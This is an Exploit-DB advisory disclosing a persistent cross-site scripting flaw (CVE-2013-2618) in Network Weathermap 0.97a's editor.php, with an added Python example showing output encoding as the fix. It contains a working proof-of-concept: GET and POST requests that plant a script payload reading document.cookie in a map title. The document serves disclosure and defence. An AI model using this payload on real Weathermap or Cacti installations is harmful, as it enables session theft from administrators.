Network Weathermap 0.97a – ‘editor.php’ Persistent Cross-Site Scripting

  • Author: Daniel Ricardo dos Santos
    Date: 2013-04-02
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/24913/
  • Network Weathermap 0.97a - Persistent XSS
    Earlier versions are also possibly vulnerable.
    
    INFORMATION
    
    Product: Network Weathermap 0.97a
    Remote-exploit: yes
    Vendor-URL: http://www.network-weathermap.com/
    
    Discovered by: Daniel Ricardo dos Santos
    CVE Request - 15/03/2013
    CVE Assign - 18/03/2013
    CVE Number - CVE-2013-2618
    Vendor notification - 18/03/2013
    Vendor reply - No reply
    Public disclosure - 01/04/2013
    
    OVERVIEW
    
    Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying
    available files.
    
    INTRODUCTION
    
    Network Weathermap is a network visualisation tool, to take data you
    already have and show you an overview of your network in map form.
    Support is built in for RRD, MRTG (RRD and old log-format), and
    tab-delimited text files. Other sources are via plugins or external scripts.
    
    VULNERABILITY DESCRIPTION
    
    The vulnerability occurs when a user injects HTML and JavaScript into the
    title of a map in editor.php. This stored title is later rendered, without
    output encoding, to any user who lists the available files via
    editor.php?action=newfile.
    
    Besides the title, other fields also allow an attacker to upload malicious
    PHP code to the webserver, which can later be executed if the attacker has
    direct access to that file.
    
    This application is often used as a plugin for Cacti. The vulnerability can
    be exploited in this mode as well, in
    weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and
    it can be used to exploit Cacti.
    
    To test it, simply create a map or edit an existing one:
    GET editor.php?mapname=test&action=newmap
    
    Then edit the map title with the payload:
    POST editor.php
    plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO
    
    Then display the titles:
    GET editor.php
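    The following added example (not code from the advisory or from Network
    Weathermap) decodes the map_title field from the POST body quoted above and
    contrasts a hypothetical file-listing renderer that interpolates the stored
    title verbatim, which is the defect class described here, with one that applies
    HTML output encoding; the listing markup is an assumption, not editor.php's own.

```python
import html
from urllib.parse import parse_qs

# Constructed from the POST body quoted in the advisory, trimmed to the
# fields relevant to the stored title (sample input, not a live request).
SAMPLE_POST_BODY = (
    "plug=0&mapname=test&action=set_map_properties"
    "&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"
    "&map_legend=Traffic+Load&map_width=800&map_height=600"
)


def map_title_from_post(body: str) -> str:
    """Decode the application/x-www-form-urlencoded body and return map_title
    exactly as a server would persist it (percent-decoded, '+' -> space)."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("map_title", [""])[0]


def render_listing_vulnerable(mapname: str, title: str) -> str:
    """Hypothetical listing entry that echoes the stored title unencoded.
    This models the advisory's bug, not Weathermap's actual template."""
    return f'<li><a href="editor.php?mapname={mapname}">{mapname}</a> - {title}</li>'


def render_listing_fixed(mapname: str, title: str) -> str:
    """Same entry with output encoding for both the attribute and body
    contexts; quote=True also encodes ' and " for the href attribute."""
    safe_name = html.escape(mapname, quote=True)
    safe_title = html.escape(title, quote=True)
    return f'<li><a href="editor.php?mapname={safe_name}">{safe_name}</a> - {safe_title}</li>'


def title_needs_review(title: str) -> bool:
    """Coarse audit check for already-stored titles: a map title has no
    legitimate need for angle brackets, so flag any that carry them."""
    return "<" in title or ">" in title


if __name__ == "__main__":
    stored = map_title_from_post(SAMPLE_POST_BODY)
    print("stored title:", stored)
    print("vulnerable  :", render_listing_vulnerable("test", stored))
    print("fixed       :", render_listing_fixed("test", stored))
    print("flag for review:", title_needs_review(stored))
```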
    
    VERSIONS AFFECTED
    
    Tested with version 0.97a (current release) but earlier versions are
    possibly vulnerable.
    
    SOLUTION
    
    There is no official patch currently available.
    
    NOTES
    
    The Common Vulnerabilities and Exposures (CVE) project has assigned the
    name CVE-2013-2618 to this issue. This is a candidate for inclusion in
    the CVE list (http://cve.mitre.org), which standardizes names for
    security problems.
    
    CREDITS
    
    Daniel Ricardo dos Santos
    SEC+ Information Security Company - http://www.secplus.com.br/